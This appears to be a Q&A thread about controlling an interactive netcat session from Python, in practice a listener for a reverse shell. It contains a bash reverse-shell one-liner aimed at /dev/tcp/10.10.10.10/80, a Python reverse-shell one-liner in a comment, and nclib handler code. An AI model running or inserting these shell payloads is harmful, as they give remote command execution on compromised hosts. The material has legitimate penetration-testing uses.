# Control an interactive. netcat connection with Python (subprocess or similar)

Tags: python, python-3.x, subprocess

I am trying to control netcat session using Python, the connection would be something like this:

```
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 37878                        
id #### ----> user input
uid=0(root) gid=0(root) groups=0(root) #### ----> output
pwd #### ----> user input
/root #### ----> output
exit #### ----> user input
```

However, I want to be able to control and process every input before sending it, and every output before displaying it.

I tried using subprocess, but could not get it to work, my code was something like:

```
#!/usr/bin/python
import subprocess

def listener():
    command = ''
    proc = subprocess.Popen(['nc', '-lvn','1234'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

    while (command != 'exit'):
        command = bytes(input(),'utf-8')
        proc.stdin.write(command)
        print(proc.stdout.readline().decode())

listener()
```

and I cannot receive any proper output from the other machine, the only output I receive is:

```
sh: no job control in this shell
```

I do not mind using any other library other than subprocess if it helps.

Comment: wouldn't it be easier to just use sockets directly?

Comment: @SamMason I tried, but I could not get it to work, see my previous question, I asked about the problem I was facing, but no answers.

Comment: https://github.com/rhelmot/nclib

Comment: @Ash-Ishh.. testing it right now, hope it gets the job done.

Answer (score 1):

Control an interactive netcat connection with Python 3

Use nclib:

```
pip install nclib
```

Documentation:
https://nclib.readthedocs.io/en/latest/

Bash reverse shell

```
bash --noprofile --posix -i >& /dev/tcp/10.10.10.10/80 0>&1
```

Python 3 netcat listener, input and output assigned to variables command and data respectively.

```
import nclib


def listener(port):
    """ local netcat listener for reverse bash shell from a remote host. """
    server = nclib.TCPServer(('0.0.0.0', int(port)))
    print("listening ...")
    for client in server:
        print('Connected to %s:%d' % client.peer)
        command = ""
        while command != "exit":
            try:
                # if command was entered by the user
                if len(command) > 0:
                    # read the line to hide command from output
                    if command in client.readln().decode('utf-8').strip(" "):
                        pass  # disregard the last command

                # get output until dollar sign (bash --posix forces bash-X.X$)
                data = client.read_until('$')
                print(data.decode('utf-8'), end="")  # print string of received bytes

                # get user input command and write command to socket
                command = input(" ")
                client.writeln(command)

            # handle exceptions and exiting
            except KeyboardInterrupt:
                print("\nKeyboardInterrupt")
                exit(1)
            except Exception as e:
                print("\nException Occurred\n")
                print(e)
                exit(1)
        print("Disconnected :-)")
        exit(1)
```

Answer (score 0):

Don't reinvent the wheel, use [nclib](https://nclib.readthedocs.io/en/latest/):

```
from nclib import TCPServer
server = TCPServer(('0.0.0.0', 1234))
for client in server:
    print(client.recv()) # print to shell
    client.send(client.recv()) # echo to client
```

---

Test:

```
nc 127.0.0.1 1234
```

---

Install:

```
pip install nclib
```

Comment: This is good for echoing data back and forth, I was able to done this using normal sockets, however, if we connected to the server using something like: ```python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'``` (pipes to bash), unfortunately, we are not able to pass commands to bash to execute them on the other end and receive their output.

Comment: `nclib` does exactly what you need, but you've to read the docs: https://buildmedia.readthedocs.org/media/pdf/nclib/latest/nclib.pdf